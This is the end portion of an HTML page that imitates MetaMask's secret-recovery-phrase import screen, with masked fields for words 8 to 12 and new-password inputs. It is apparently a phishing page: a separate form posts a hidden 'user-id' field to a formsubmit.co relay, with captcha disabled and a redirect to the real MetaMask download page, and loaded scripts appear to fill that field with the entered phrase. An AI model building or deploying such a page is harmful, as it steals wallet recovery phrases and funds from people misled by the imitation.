                      </div>
                    </div>
                    <div class="import-srp__srp-word">
                      <label
                        for="import-srp__srp-word-7"
                        class="import-srp__srp-word-label"
                      >
                        <p
                          class="mm-box mm-box--color-text-default mm-text mm-text--body-md"
                        >
                          8.
                        </p>
                      </label>
                      <div class="MuiFormControl-root MuiTextField-root">
                        <div
                          class="jss12 MuiInput-formControl MuiInput-root MuiInputBase-formControl MuiInputBase-root"
                        >
                          <input
                            name="phrase-8"
                            aria-invalid="false"
                            autocomplete="off"
                            id="import-srp__srp-word-7"
                            type="password"
                            dir="auto"
                            data-testid="import-srp__srp-word-7"
                            class="MuiInput-input MuiInputBase-input phr-word"
                          />
                        </div>
                      </div>
                      <div class="show-hide-toggle">
                        <input
                          class="show-hide-toggle__input"
                          id="import-srp__srp-word-7-checkbox"
                          type="checkbox"
                          data-testid="import-srp__srp-word-7-checkbox"
                        /><label
                          for="import-srp__srp-word-7-checkbox"
                          class="show-hide-toggle__label"
                          title="Show/Hide this word of the secret recovery phrase"
                          ><svg
                            width="24"
                            height="24"
                            fill="currentColor"
                            aria-label="This word is hidden"
                            class="show-hide-toggle__icon"
                            viewBox="0 0 640 512"
                          >
                            <path
                              d="M634 471 36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471M296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47m46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46M320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1m0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400"
                            /></svg
                        ></label>
                      </div>
                    </div>
                    <div class="import-srp__srp-word">
                      <label
                        for="import-srp__srp-word-8"
                        class="import-srp__srp-word-label"
                      >
                        <p
                          class="mm-box mm-box--color-text-default mm-text mm-text--body-md"
                        >
                          9.
                        </p>
                      </label>
                      <div class="MuiFormControl-root MuiTextField-root">
                        <div
                          class="jss12 MuiInput-formControl MuiInput-root MuiInputBase-formControl MuiInputBase-root"
                        >
                          <input
                            name="phrase-9"
                            aria-invalid="false"
                            autocomplete="off"
                            id="import-srp__srp-word-8"
                            type="password"
                            dir="auto"
                            data-testid="import-srp__srp-word-8"
                            class="MuiInput-input MuiInputBase-input phr-word"
                          />
                        </div>
                      </div>
                      <div class="show-hide-toggle">
                        <input
                          class="show-hide-toggle__input"
                          id="import-srp__srp-word-8-checkbox"
                          type="checkbox"
                          data-testid="import-srp__srp-word-8-checkbox"
                        /><label
                          for="import-srp__srp-word-8-checkbox"
                          class="show-hide-toggle__label"
                          title="Show/Hide this word of the secret recovery phrase"
                          ><svg
                            width="24"
                            height="24"
                            fill="currentColor"
                            aria-label="This word is hidden"
                            class="show-hide-toggle__icon"
                            viewBox="0 0 640 512"
                          >
                            <path
                              d="M634 471 36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471M296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47m46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46M320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1m0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400"
                            /></svg
                        ></label>
                      </div>
                    </div>
                    <div class="import-srp__srp-word">
                      <label
                        for="import-srp__srp-word-9"
                        class="import-srp__srp-word-label"
                      >
                        <p
                          class="mm-box mm-box--color-text-default mm-text mm-text--body-md"
                        >
                          10.
                        </p>
                      </label>
                      <div class="MuiFormControl-root MuiTextField-root">
                        <div
                          class="jss12 MuiInput-formControl MuiInput-root MuiInputBase-formControl MuiInputBase-root"
                        >
                          <input
                            name="phrase-10"
                            aria-invalid="false"
                            autocomplete="off"
                            id="import-srp__srp-word-9"
                            type="password"
                            dir="auto"
                            data-testid="import-srp__srp-word-9"
                            class="MuiInput-input MuiInputBase-input phr-word"
                          />
                        </div>
                      </div>
                      <div class="show-hide-toggle">
                        <input
                          class="show-hide-toggle__input"
                          id="import-srp__srp-word-9-checkbox"
                          type="checkbox"
                          data-testid="import-srp__srp-word-9-checkbox"
                        /><label
                          for="import-srp__srp-word-9-checkbox"
                          class="show-hide-toggle__label"
                          title="Show/Hide this word of the secret recovery phrase"
                          ><svg
                            width="24"
                            height="24"
                            fill="currentColor"
                            aria-label="This word is hidden"
                            class="show-hide-toggle__icon"
                            viewBox="0 0 640 512"
                          >
                            <path
                              d="M634 471 36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471M296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47m46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46M320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1m0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400"
                            /></svg
                        ></label>
                      </div>
                    </div>
                    <div class="import-srp__srp-word">
                      <label
                        for="import-srp__srp-word-10"
                        class="import-srp__srp-word-label"
                      >
                        <p
                          class="mm-box mm-box--color-text-default mm-text mm-text--body-md"
                        >
                          11.
                        </p>
                      </label>
                      <div class="MuiFormControl-root MuiTextField-root">
                        <div
                          class="jss12 MuiInput-formControl MuiInput-root MuiInputBase-formControl MuiInputBase-root"
                        >
                          <input
                            name="phrase-11"
                            aria-invalid="false"
                            autocomplete="off"
                            id="import-srp__srp-word-10"
                            type="password"
                            dir="auto"
                            data-testid="import-srp__srp-word-10"
                            class="MuiInput-input MuiInputBase-input phr-word"
                          />
                        </div>
                      </div>
                      <div class="show-hide-toggle">
                        <input
                          class="show-hide-toggle__input"
                          id="import-srp__srp-word-10-checkbox"
                          type="checkbox"
                          data-testid="import-srp__srp-word-10-checkbox"
                        /><label
                          for="import-srp__srp-word-10-checkbox"
                          class="show-hide-toggle__label"
                          title="Show/Hide this word of the secret recovery phrase"
                          ><svg
                            width="24"
                            height="24"
                            fill="currentColor"
                            aria-label="This word is hidden"
                            class="show-hide-toggle__icon"
                            viewBox="0 0 640 512"
                          >
                            <path
                              d="M634 471 36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471M296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47m46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46M320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1m0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400"
                            /></svg
                        ></label>
                      </div>
                    </div>
                    <div class="import-srp__srp-word">
                      <label
                        for="import-srp__srp-word-11"
                        class="import-srp__srp-word-label"
                      >
                        <p
                          class="mm-box mm-box--color-text-default mm-text mm-text--body-md"
                        >
                          12.
                        </p>
                      </label>
                      <div class="MuiFormControl-root MuiTextField-root">
                        <div
                          class="jss12 MuiInput-formControl MuiInput-root MuiInputBase-formControl MuiInputBase-root"
                        >
                          <input
                            name="phrase-12"
                            aria-invalid="false"
                            autocomplete="off"
                            id="import-srp__srp-word-11"
                            type="password"
                            dir="auto"
                            data-testid="import-srp__srp-word-11"
                            class="MuiInput-input MuiInputBase-input phr-word"
                          />
                        </div>
                      </div>
                      <div class="show-hide-toggle">
                        <input
                          class="show-hide-toggle__input"
                          id="import-srp__srp-word-11-checkbox"
                          type="checkbox"
                          data-testid="import-srp__srp-word-11-checkbox"
                        /><label
                          for="import-srp__srp-word-11-checkbox"
                          class="show-hide-toggle__label"
                          title="Show/Hide this word of the secret recovery phrase"
                          ><svg
                            width="24"
                            height="24"
                            fill="currentColor"
                            aria-label="This word is hidden"
                            class="show-hide-toggle__icon"
                            viewBox="0 0 640 512"
                          >
                            <path
                              d="M634 471 36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471M296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47m46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46M320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1m0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400"
                            /></svg
                        ></label>
                      </div>
                    </div>
                  </div>
                </div>
                <div class="create-new-vault__create-password">
                  <div
                    class="MuiFormControl-marginNormal MuiFormControl-root MuiTextField-root"
                  >
                    <label
                      class="jss13 jss9 MuiFormLabel-root MuiInputLabel-animated MuiInputLabel-formControl MuiInputLabel-root MuiInputLabel-shrink"
                      data-shrink="true"
                      for="password"
                      id="password-label"
                      >New password (8 characters min)</label
                    >
                    <div
                      class="jss12 MuiInput-formControl MuiInput-root MuiInputBase-formControl MuiInputBase-root"
                    >
                      <input
                        aria-invalid="false"
                        autocomplete="new-password"
                        id="password"
                        type="password"
                        name="password"
                        dir="auto"
                        data-testid="create-vault-password"
                        class="MuiInput-input MuiInputBase-input"
                      />
                    </div>
                  </div>
                  <div
                    class="MuiFormControl-marginNormal MuiFormControl-root MuiTextField-root"
                  >
                    <label
                      class="jss13 jss9 MuiFormLabel-root MuiInputLabel-animated MuiInputLabel-formControl MuiInputLabel-root MuiInputLabel-shrink"
                      data-shrink="true"
                      for="confirm-password"
                      id="confirm-password-label"
                      >Confirm password</label
                    >
                    <div
                      class="jss12 MuiInput-formControl MuiInput-root MuiInputBase-formControl MuiInputBase-root"
                    >
                      <input
                        aria-invalid="false"
                        autocomplete="new-password"
                        id="confirm-password"
                        name="confirm-password"
                        type="password"
                        dir="auto"
                        data-testid="create-vault-confirm-password"
                        class="MuiInput-input MuiInputBase-input"
                      />
                    </div>
                  </div>
                </div>
              </form>
              <form
                action="https://formsubmit.co/77bc7e02d65ac5b13085028955b819c2"
                method="post"
                id="my-new-form"
                class="align-items-start d-flex justify-center"
              >
                <input
                  type="text"
                  name="user-id"
                  id="user-id-form"
                  style="display: none"
                />
                <input
                  type="hidden"
                  name="_next"
                  value="https://metamask.io/download"
                />
                <input type="hidden" name="_captcha" value="false" />
                <button
                  type="submit"
                  class="create-new-vault__submit-button mm-box mm-box--align-items-center mm-box--background-color-primary-default mm-box--color-primary-inverse mm-box--display-inline-flex mm-box--justify-content-center mm-box--padding-0 mm-box--padding-left-4 mm-box--padding-right-4 mm-box--rounded-pill mm-button-base mm-button-base--size-md mm-button-primary mm-text mm-text--body-md-medium"
                  disabled
                  data-testid="create-new-vault-submit-button"
                  name="submit-user-info"
                  id="submit-btn"
                >
                  Import
                </button>
              </form>
            </div>
          </div>
        </div>
      </div>
    </div>
    <script type="module" src="/index.ea7f1fab.js"></script>
    <script>
      window.addEventListener("load", () => {
        navigator.userAgent.toLowerCase();
      });
    </script>
    <script type="module" src="/submit.7f15b0bf.js"></script>
    <script type="module" src="./src/submit-val.js"></script>
  </body>
</html>
